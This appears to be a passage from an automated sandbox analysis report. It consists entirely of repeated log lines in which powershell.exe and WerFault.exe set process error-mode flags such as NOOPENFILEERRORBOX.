            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
